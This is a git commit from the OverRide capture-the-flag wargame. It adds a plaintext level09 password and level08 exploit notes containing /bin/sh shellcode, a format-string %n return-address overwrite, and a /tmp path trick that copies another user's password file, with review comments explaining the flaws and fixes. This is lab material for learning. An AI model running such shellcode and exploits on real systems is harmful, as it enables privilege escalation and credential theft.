feat: level08 + level09 elf
This commit is contained in:
parent 8b91fc4f30
commit 17686e16d3
@ -0,0 +1 @@
|
|||
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
|
|
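Review bot: this one-line file commits the level09 password in plain text, and the same value is pasted verbatim at the end of the notes file in this commit (`fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S`), so the secret now lives in two places. If the flag must be kept at all, keep a single copy, and consider leaving credential files out of the repository (for example via `.gitignore`); once pushed, the value stays in history even if the file is removed later, so it should be treated as disclosed.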
@ -0,0 +1,44 @@
|
|||
load shellcode in env with nop slide
|
||||
|
||||
level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
|
||||
level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
|
||||
level08@OverRide:~$
|
||||
|
||||
|
||||
(gdb) p (char *)getenv("SHELLCODE")
|
||||
$1 = 0xffffffffffffe892 <Address 0xffffffffffffe892 out of bounds>
|
||||
|
||||
need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
|
||||
|
||||
Better version (file doesn't need to exist as log_wrapper is called before fopen)
|
||||
|
||||
level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
|
||||
ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
|
||||
level08@OverRide:~$ cat backups/.log
|
||||
LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
|
||||
level08@OverRide:~$
|
||||
|
||||
with env -i :
|
||||
Breakpoint 1, 0x0000000000400a5a in main ()
|
||||
(gdb) p (char *)getenv("SHELLCODE")
|
||||
$1 = 0xffffffffffffef79 <Address 0xffffffffffffef79 out of bounds>
|
||||
|
||||
|
||||
|
||||
env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
|
||||
|
||||
|
||||
actually its way simpler T_T :
|
||||
|
||||
level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
|
||||
level08@OverRide:~$ cd /tmp
|
||||
level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
|
||||
ERROR: Failed to open /home/users/level09/pass
|
||||
level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
|
||||
level08@OverRide:/tmp$ cat backups/
|
||||
home/ .log
|
||||
level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
|
||||
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
|
||||
level08@OverRide:/tmp$ exit
|
||||
logout
|
||||
Connection to localhost closed.
|
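Review bot: the working solution is buried at the end, after `actually its way simpler T_T :`, behind two attempts that were dropped without saying so: the env-shellcode plus return-address overwrite (whose target address even differs between the gdb run, `0xffffffffffffe892`, and the `env -i` run, `0xffffffffffffef79`, which is why the `with env -i :` block exists but is never explained), and the `%n` format-string command whose output was never recorded. Put the `mkdir -p /tmp/backups/home/users/level09/` approach first and mark the other two as abandoned. The notes should also state the two weaknesses the transcript actually demonstrates: the `backups/.log` line shows the user-supplied filename reaching `log_wrapper` as a format string (`%11$9x` expands to `58585858`, the `XXXX` bytes of the argument on the stack), and the backup is written to `backups/` plus the given absolute path, relative to the current working directory, so running from `/tmp` with a pre-created directory tree leaves a copy of `/home/users/level09/.pass` in a user-writable location. The fix on the binary side would be logging the name through a `%s` argument and canonicalizing or rejecting caller-controlled paths before building the backup path. Finally, the copied password is pasted verbatim in the last lines; it is already the content of the separate one-line file in this commit, so one copy is enough.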
Binary file not shown.